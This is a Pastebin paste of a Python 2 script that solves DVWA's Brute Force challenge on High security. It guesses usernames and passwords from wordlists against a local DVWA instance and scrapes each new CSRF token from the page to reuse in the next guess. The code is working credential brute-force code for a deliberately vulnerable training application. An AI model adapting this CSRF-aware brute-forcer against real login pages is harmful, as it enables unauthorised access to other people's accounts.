Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ############################################################################################################################################################################################################################
- # DVWA Brute Force High: CSRF Token
- #
- # Solution to the Brute Force section on High Security - brute forces the password, extracting the CSRF token
- # from the page to use in the next guess
- #
- ############################################################################################################################################################################################################################
- import httplib
- import re
- # CSRF token of the format:
- # <input type="hidden" name="user_token" value="b59fc306cc2b62fc89667c2f42122e1f">
- request = "/dvwa/vulnerabilities/brute/index.php?username=^USER^&password=^PASS^&Login=Login&user_token=^USERTOKEN^"
- #username = "admin"
- passwordfile = 'C:\Users\Administrator\Desktop\pass.txt'
- usersfile = 'C:\Users\Administrator\Desktop\user.txt'
- cookies = "security=high; PHPSESSID=6ek9h8fph3mtr8lunrpoa0jq06"
- failtext = "Username and/or password incorrect."
- with open(passwordfile) as f:
- passwords = f.readlines()
- with open(usersfile) as f:
- usernames = f.readlines()
- for username in usernames:
- username = username.strip()
- #Collect the first CSRF token
- conn = httplib.HTTPConnection("127.0.0.1")
- conn.request("GET", "/dvwa/vulnerabilities/brute/index.php", "", {"Cookie": cookies})
- result = conn.getresponse()
- #print result
- #print result.status, result.reason
- data = result.read()
- #print '{', data, '}'
- csrf_pattern = "<input type='hidden' name='user_token' value='(.*?)' />"
- m = re.search(csrf_pattern, data)
- user_token = m.group(1)
- print "Working on user ", username
- print "INITIAL CSRF TOKEN :", user_token
- for password in passwords:
- password = password.strip()
- conn = httplib.HTTPConnection("127.0.0.1")
- requestParams = request.replace("^USER^", username)
- requestParams = requestParams.replace("^PASS^", password).replace("^USERTOKEN^", user_token)
- #print requestParams
- conn.request("GET", requestParams, "", {"Cookie": cookies})
- result = conn.getresponse()
- #print result.status, result.reason
- data = result.read()
- if failtext in data:
- #print "Incorrect password attempted. ", password
- pass
- else:
- print "Found correct password:", username, password
- break
- m = re.search(csrf_pattern, data)
- user_token = m.group(1)
- #print "NEXT CSRF TOKEN :", user_token
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement